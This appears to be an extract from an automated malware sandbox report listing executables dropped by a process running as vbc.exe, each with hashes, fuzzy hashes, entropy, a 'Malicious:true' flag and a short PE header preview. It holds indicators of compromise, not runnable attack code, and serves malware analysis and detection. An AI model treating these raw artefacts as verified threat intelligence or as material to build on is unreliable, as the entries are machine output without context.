Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1522688
Entropy (8bit):5.323792509385658
Encrypted:false
SSDEEP:24576:+yAAWSS2H8mRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:+IUM8mRVlbnXf9gPTTW7H1GXC
MD5:37312C05B8CCA110955CAA8CDE1CC850
SHA1:7CC534E9DB89E3D8D9F86EE332BE9513BEFEC546
SHA-256:3349090B19FA20FE98BC33DB7FD1BB0E7DCB4E33E26646575784A386517B22FB
SHA-512:9659F2EB3280C248E6E189CFE6DAE44EBD1944AE66DEB334D8CC028E7791EC1538888A5624BDEA58A7B81A74C4AA4FEEE882D1A6D70AEF0158289B55FC7FC808
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@.................................!...................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1293824
Entropy (8bit):5.208221080622871
Encrypted:false
SSDEEP:24576:sDpRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:mRVlbnXf9gPTTW7H1GXC
MD5:EC0884FCCB6B8FEB0016A28A3DA07F90
SHA1:3B46B79204DA02C1FEA51122F6876D224CEB3536
SHA-256:1BF6606CD7B39952773ECCF162F2E57F30DFDA6A1C637688C073E1EE9453DBDB
SHA-512:07E948D11C5ED617D743505B0D8DC7DA51EFC2B58354C6D6C8049E730E810D4919DDF8C5F9972EA3942D0BC99B0AC48A4EBB8FAAA4B63B13008898785E0505DC
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@..........................................................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...p.......`...^..............@...........................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1147904
Entropy (8bit):5.031767225872832
Encrypted:false
SSDEEP:12288:s0TKGVlM41NTnXENcMduaD3aawgPwCnQ3MHv8CI4OJ1bbPHHcFb+KKqCGNpcyop/:LRVldlnXfH9gPwCn7vOb7HHcp/CGXQp
MD5:F127162608410574D7451CA54048A5AB
SHA1:6C4F15EDC895470A4D282A7A8B03A8BB6C30B865
SHA-256:6E488FACEBA08F83A49269BC9843C2AB7A168FB46CE95548FC2225331C62DE3B
SHA-512:967125DD46F296619D8D80E3644F8575D0E4E85A8D8CFAC8808773C0A662E3E7DB38FCBC12A1AE3803069F9B6072002E841A37631567788958A52F8654EFB399
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@.................................b........................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...P.......@...D..............@...................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1418752
Entropy (8bit):5.390652529519541
Encrypted:false
SSDEEP:24576:mAZHHrLZF/FRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:mePZFFRVlbnXf9gPTTW7H1GXC
MD5:29FC1330AB04BC87D4FE7ECB52FDA422
SHA1:F39119A05F88807046E8D2B8D833CCA5E46B6718
SHA-256:0DBF93CC84D9978F0A701932301C21ACE06799AB9E04E37F390E5B7C136643EB
SHA-512:B3D17D9E70A81F7E5C4A197B72A45FCC80FB802DB162F9E2D0EA6643B5D1268E874E7D2271493763CB98B86FBF885F00B655CB8CCD65CF74065E6BF8FEADC669
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@..................................n..........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...p.......`...F..............@...................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):53721600
Entropy (8bit):6.543240446686072
Encrypted:false
SSDEEP:1572864:zNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:zQ9lw68HSq
MD5:5FC3D16BE5FE979C92C6F2F627E0B2B2
SHA1:A081AB22B96D5E9579B1252126F6F367CD6ED7F7
SHA-256:E225BF1AFCF995C9E07A2ED5C4B05543E105541176BE6291C54540770D15C5C7
SHA-512:A60B645433364A865225CCDE718614875EC491F751973DB3B24DFACFDE536B0B4143001225CF340E1FD8DEB8D95F70C92FB370D94FB87A8F0B2483483B2C7C5F
Malicious:true
Reputation:unknown
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5.....~.4.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):40811520
Entropy (8bit):6.461354152046433
Encrypted:false
SSDEEP:786432:FbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ayMI5aH:FyM8TOtIlPv+msZPH1u5WkID5uceo4qY
MD5:13DC1F47AFD3762A1C68F343C12BF590
SHA1:2411DD7CE29E074658001F97B4843487626BC130
SHA-256:D623649E61EE3FDEEB430C1729D553A6E5D7EA013DACB9F769EB91FA3E7485DB
SHA-512:D8B7E735B425D178F10F6AA0760CAA390C2989D763B8AC44A6CD28A6ED25A02282FF4F6D96406C576E31B9BC404DE3C6ABDAFCEC7A1AD3ED6032C8723E6FAA2A
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.......o.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1657344
Entropy (8bit): 5.6302356734494
Encrypted: false
SSDEEP: 24576:fE8DMeflpnIOvYUIRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:ftDD9pnIOCRVlbnXf9gPTTW7H1GXC
MD5: ED060808D2831E012B90A99D2928E0CC
SHA1: 1153F5A3A7B2FA53077BA680285D7FC434A139A6
SHA-256: 6391062C71239E7E2AAC22B0E73D583466AE1BE157306FB68A710C17B08E093A
SHA-512: A46AFD05DB81FEB962DF59E9963BE996AB820D99670425C41CCEC87A1EC060384DAC38EB6A85E40704C40CD8825510F147CA2597565B4C965889C675B9BB82A9
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4364800
Entropy (8bit): 6.746889610910518
Encrypted: false
SSDEEP: 98304:jHzorVmr2ZkRpdJYol5RVlbnP9WXW7H6C:IiRp7xl5HBVH
MD5: 54BF989547096F5ECF5FFE703C9BE09F
SHA1: C3B0ABD00E503AAABFB1F35A48238265E4A78F2E
SHA-256: 99580800B5ECBA06F8FF031E455F39AA75C58AF7331A1A7DB259CAEC3126ED32
SHA-512: 446699795D91ED71A16ECAC1D3D7EB3404BE62C4B5159A927EC5AF1D4F8CD010A54C8807BEB5627A7E43860D411E8B649D25EE1181C193BC8F1AE53C6B53D9ED
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1238528
Entropy (8bit): 5.139881155630218
Encrypted: false
SSDEEP: 24576:hEyTSRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:GymRVlbnXf9gPTTW7H1GXC
MD5: 70A1CF267F63DBFF49302547FEB246D6
SHA1: 98C57C1645B14C0D336B211E2EC540B1637024B6
SHA-256: 22C0DFBDA0E0E08419550CC093EE4933EABD6321C970929C5CB7490DBA7B9803
SHA-512: 7E6AA011237EA939DF6E63AAA45EF234E45FCA822DBFEDA6E4FE02643CD882DB4BFCA7C2E7EE8F12E115D170A506359A80D89DED6F77C3C993479A1AA241ECC1
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2354176
Entropy (8bit): 7.049993709502122
Encrypted: false
SSDEEP: 49152:chDdVrQ95RW0YEHyWQXE/09Val0GHDmg27RnWGj:chHYW+HyWKMD527BWG
MD5: D2EAE0B17D8ED7CE90F29615B714FC9B
SHA1: 2473D69492CBF264D9FAF7FEC3615437185B50BF
SHA-256: 1561C66499E719E475C17B802513F83D7AC71E07014CC4742083C10CF7DD195C
SHA-512: B1D483A5D9DC35BC342B5691CD78660514B546DF35871A8A2764954198F05055F47C10455853959DA665A39CD41C5E968E426FFAD630A2B5389BCA02AAC517EC
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1825280
Entropy (8bit): 7.155296395967679
Encrypted: false
SSDEEP: 49152:80EzQSyRPRoc1XRVlbnXf9gPTTW7H1GXC:7jRPRTRVlbnP9WXW7H6C
MD5: 6DACCC8E081640B3D66D374B55531892
SHA1: 700E0F6F1BFDE1B7D1FF84BBCBE7301A79AB3E7F
SHA-256: 7530FEEE2DB54C12CFAC7C713B2594EF85E53B2007C7F410E85F4CD0E6CF779D
SHA-512: 41098C93356C99B300B235FCE364CCB10F73619162551022E13C54A9F384F7EFB6F104D53EB4D45C648BE1DADFCE362FAC4E9D47833CA88C9460CBCF5C9897BE
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1847808
Entropy (8bit): 7.1422350184334285
Encrypted: false
SSDEEP: 49152:qD2VmAyiwIb8boQ7RVlbnXf9gPTTW7H1GXC:a2V7wIbyRVlbnP9WXW7H6C
MD5: 275436DDF0002857653D4F4DEDC8EB4E
SHA1: 50F66AED8711CF3A146350BB2839D5BA78ECC1B6
SHA-256: 1527D06A5BC860F2A517C1B2B760E7864925C46AED7287075C72C985283815EF
SHA-512: D50472BC7F33FB3BADCEE14C6BA9EBF53ADAA75EE178BAF9A36A2FBF2175821C98C48B2C2DA81546FDBC9FC06A3916C928DD21135B5D5FE00A3E70AF7B35D227
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2853376
Entropy (8bit): 6.948665349881427
Encrypted: false
SSDEEP: 49152:ZfD3zO9ZhBGloizM3HRNr00TRVlbnXf9gPTTW7H1GXC:NDaalxzM00TRVlbnP9WXW7H6C
MD5: 5CE615DD5B30E969B9907ED6FDAC132D
SHA1: 227752FEC8AC78F656CE4272E3D64B974FD290A9
SHA-256: 713A530E31B69D16E51433CE725B943E841F1FC8E522DC2A3E46C17231FD20DC
SHA-512: 7571B6F30E831FE8B23493AAFCCA8DE5E965DD3C3EA5CBB7B01079A5DBDFF92D8248EE29E0A135F4F82B260A2B2DC2BEF7E77A94ED154CE0825D6FFF47DDB60A
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4320256
Entropy (8bit): 6.823109886706186
Encrypted: false
SSDEEP: 98304:FI72LvkrDpbxJRoIMLRVlbnP9WXW7H6C:FI7nbihHBVH
MD5: 0FBDAB6DAC4FA1B63D521DF1414E4133
SHA1: B32DABDB05A491CD6B3AC34879A5A3688138B735
SHA-256: BAE57D15E9522253EC3B942CC4660C0BC21B9585033EF726F530391BD2A99A8B
SHA-512: 803776223D566A1D9627CDF7E86BE5EACEB22284320F5DDE7F7368DEFCBC6FAA2E6BB37636224FA2AE571D42213052F1573B7D6AC9B5D79A626F7180DB212B64
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2062336
Entropy (8bit): 7.094403187077111
Encrypted: false
SSDEEP: 49152:MWnm5iOMkjmQWkVbRVlbnXf9gPTTW7H1GXC:DsMkjRVlbnP9WXW7H6C
MD5: 8CE5733E26180EE59EE5B42B6CEAC54C
SHA1: 51B50504C07A4DC4E611CF50E1B2898E60B44FCC
SHA-256: 62E93DD8DC62586BBF31076BBE9DA7CA69D47E002F0ABCCFC7AD90B54ED45469
SHA-512: 9D34B75CD34A61E67DAED3ECBBB5BC9B0563A82F3A4322EB071A47B0D2EBBF0FCC01B635ED67E2C9455991A2DE04B1E9C34FB0554FA1B77455BC15FA2703A5E7
Malicious: true
Reputation: unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ........... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                    Entropy (8bit):7.163082305650498
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:4wNPdQO7BJTfmEQRVlbnXf9gPTTW7H1GXC:fOO7Pm7RVlbnP9WXW7H6C
                                                                                                                                                                    MD5:BD44E99F0421C75E87FA097C692B9794
                                                                                                                                                                    SHA1:F58FB04AAD9E56A6CEEA2AE229D6207406F625ED
                                                                                                                                                                    SHA-256:A14A16AF2463F7196FF2772C7DFDDFA33E4840AF9CE3D56563BE7CF3114F4F91
                                                                                                                                                                    SHA-512:9F13BD5FEC77475AC9E47C5A46E58CBEA07FD6D41E6CACE73B858CD5CFFC02127D4D0F2F64A03E593766E2D04718D9D3E1E43F9153C81E99E8E1640744A974CC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                    Entropy (8bit):7.142227376090218
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:iD2VmAyiwIb8boQ7RVlbnXf9gPTTW7H1GXC:i2V7wIbyRVlbnP9WXW7H6C
                                                                                                                                                                    MD5:816164B1FD43DE7CBB52E3CC95549E52
                                                                                                                                                                    SHA1:2228C52CA72C024293B2402D5C095DA5758DD6C0
                                                                                                                                                                    SHA-256:2CB9C9BD9816CE7A8CDD2199E64FA435D37238D654B2CE4B04D76EA379E6E3B9
                                                                                                                                                                    SHA-512:F6F622D7C4EB974B4D36712F35733D30D9F3FD8876F65D652139AE2328A4DC7568E2F9EA83F7E88EDD365F48B2467B778717759757E6FC242A1900F3D20F51D8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p....... .... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                    Entropy (8bit):7.16308845381576
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:AwNPdQO7BJTfmEQRVlbnXf9gPTTW7H1GXC:XOO7Pm7RVlbnP9WXW7H6C
                                                                                                                                                                    MD5:9B0892FE831FC6F5FDDF1F0E85C0D6A5
                                                                                                                                                                    SHA1:DCF71861ADD9E38F1B6D9164DB1C8E54AE91676A
                                                                                                                                                                    SHA-256:4F901E9D9D201508CF1292361B427CDEF4CF2B59B99FFF380961C5177377BD79
                                                                                                                                                                    SHA-512:C917694D9BD8D18360B598FA638314EBD4DD400ADD32432E85312F1F59A336B0AE85212D3019878FE008368280911D262595ADBAE4990D0D1C8BD210CED3BCC9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1325568
                                                                                                                                                                    Entropy (8bit):5.133974544311414
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:t4lbht6BHERVldlnXfH9gPwCn7vOb7HHcp/CGXQp:OlNtqHERVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:E073677CAC4AA71E2F80CFC741C7AF98
                                                                                                                                                                    SHA1:81149CDE7AF58CA5458ABC9318F311F3099BA664
                                                                                                                                                                    SHA-256:19C3A2FA0B98D998BC74309BBBE60A49042DCF071F4F04C57F8A206B0E41141F
                                                                                                                                                                    SHA-512:6F54076990DCAA1524F6D589A219F0F130319708F9A1A75A3D6D6D3974EC8D22F5AC5ED3E80A1A22D1FCB4F2EA4C2B089D9C14C0FC3F1E8AC648BE924DC7610C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@..................................,......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                    Entropy (8bit):5.130783208253799
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:QIxkTBVQRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:5xk1VQRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:7E3E271E175A55FA9C9242928CE46BDB
                                                                                                                                                                    SHA1:D82B7820F8A808D12830CBE2947F4911B09FFBC6
                                                                                                                                                                    SHA-256:49618736DDF25C67BBC5B91D4F676973DA6F6F232A1C247F80C6ECA3EB7D9C93
                                                                                                                                                                    SHA-512:3D14239EC8B61DE60F64C048056E2A74444E244E5A66690B77E46DE0DE3D98D996C9AC625D8FAA370FEE693528ECF016B8B59D9BEE004B09AC7009832217E017
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................|.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1335296
                                                                                                                                                                    Entropy (8bit):5.230540959114114
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:Ocssmr/RVldlnXfH9gPwCn7vOb7HHcp/CGXQp:vbuRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:036EEE183226BDBB4FF17DDE3671650B
                                                                                                                                                                    SHA1:0FC9E7452C969677F3B356920D5E2CBDAC537860
                                                                                                                                                                    SHA-256:50DF77D5CA011E6D8FC5DD9659F47F6F6E0052002EC957833198AB5CE34AAC6F
                                                                                                                                                                    SHA-512:371AA850437EFF0DD47D723336DA34D6CF04C1A20A01CB0F78F18133CB0440830E00C12A1CCF6DE4E68DF60B99A3E347CBB38D31B1FF7A0B24291AED8A6C8E3B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.....................................@.... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1383936
                                                                                                                                                                    Entropy (8bit):5.331558193760986
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:f03cT++foSBWU2YxhkgKRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:83cK+foQWU2YnPKRVlbnXf9gPTTW7H1B
                                                                                                                                                                    MD5:DAB3FF8CF829D86E91E8A4905CDA6F21
                                                                                                                                                                    SHA1:BAACA46C9F938AB13F56FDFDD87B8EFDD8E3E270
                                                                                                                                                                    SHA-256:A548ED298AD18C9C8D14BC60AADAD5B77DE5DCA9AE49358B23FD448DA23E084C
                                                                                                                                                                    SHA-512:13E05050770E2F2F764836DC232F9970904213057C0CB123A795E552721B7F867A2894F7F80A98B9F620924A9A90AF027D6A09F4BF2749E952E0A8FA8D4127F7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.................................U|.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1221120
Entropy (8bit): 5.1308300418957735
Encrypted: false
SSDEEP: 24576:qbBRzBgqRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:sBRVgqRVlbnXf9gPTTW7H1GXC
MD5: 5F7DB2CB7CA8BFA9F63DF3A56AA3958A
SHA1: 00F4D6D552203F0F5B6DAAC0D9C86FF9CD955304
SHA-256: 316132C41D9E78B4C878CDAD48373DDB5130A841A4109A2BC799F15F5C1F45A7
SHA-512: 2985ED5057A7FF1C708B2FC23980C9CA3E606FC599FD6B09C61B080A17AA57ED228AA31225849EFE12256520BC2AB9BF8DAC74CD688B123C9E68DADFA33B496B
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2168832
Entropy (8bit): 7.9387402772425615
Encrypted: false
SSDEEP: 49152:Ry53w24gQu3TPZ2psFkiSqwozoRVlbnXf9gPTTW7H1GXC:RyFQgZqsFki+ozoRVlbnP9WXW7H6C
MD5: 9665D6FA54C78031B0B9F8DF815C8E73
SHA1: 7C2A55D94D7BB38C168DA75DF440B110A5338218
SHA-256: AA319B1A0E6D829CD3258111F4CF9CBB0D916179B5A5225DB4D0065226A9286D
SHA-512: 50DD0B5F826951DCE31595D3E7CCAEF975D3100BD18293DC7FA3FE3E9EBFD5F69CBB0590AE0500C12A6E2DCDFDD5821A8E63966B491CBA43AAAFDBDFADA6818F
Malicious: true
Reputation: unknown

Process: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 3141
Entropy (8bit): 4.908053095817471
Encrypted: false
SSDEEP: 48:QU/zIRJpixRuyKDym9ggjIzI2yLWSvEyeyDKcwyqq+UpopUJNyniKyD:OObvEa4
MD5: 97027D07AAB09F42442BD15A5B65EECD
SHA1: A28D161997569F362DC30EB9210B56E41BC4C917
SHA-256: ACF0B361F026567ECA9A5A5886AC663D0053C600BC36F590D386493F37D6382C
SHA-512: BCF5272F60FA1660C2B0C7BD1FCADBE29F2124F83CA243EE381E64C90FDC3CC3D29DE385834254C6C33A5ACFF853C5B0C521BACA53CAAFD4C7E58E8EE16C332C
Malicious: false
Reputation: unknown
